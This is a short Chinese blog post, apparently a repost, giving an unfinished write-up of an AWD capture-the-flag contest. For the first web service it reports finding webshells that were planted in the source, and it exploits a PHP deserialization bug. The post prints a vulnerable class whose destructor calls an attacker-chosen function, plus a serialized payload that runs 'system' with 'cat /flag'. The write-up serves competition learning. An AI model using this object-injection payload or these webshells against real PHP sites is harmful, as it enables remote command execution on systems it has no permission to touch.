首页 > 其他 > 详细

北极星杯 awd复现

时间:2019-10-26 01:02:23      阅读:208      评论:0      收藏:0      [点我收藏+]

北极星杯 awd复现

服务器共有3个web和一个pwn

web1

1,down下web1的源码,使用D盾扫描:

技术分享图片

2,漏洞1:发现三个冰蝎的木马,和一个一句话木马

冰蝎的后门需要使用冰蝎的客户端进行连接:如图:

技术分享图片

一句话木马直接使用菜刀或蚁剑连接即可:

技术分享图片

3,漏洞2:sqlhelper.php的反序列化漏洞:

<?php
class A{
    public $name;
    public $male;
    
    function __destruct(){
        $a = $this->name;
        $a($this->male);
    }
}

$s = new A;
$a = serialize($s);
echo $a;

技术分享图片

构造payload得:

O:1:"A":2:{s:4:"name";s:6:"system";s:4:"male";s:9:"cat /flag";};

未完,先睡觉。

reference:

https://yzddmr6.tk/posts/xm-one-year-awd/#more

北极星杯 awd复现

原文:https://www.cnblogs.com/v01cano/p/11741547.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!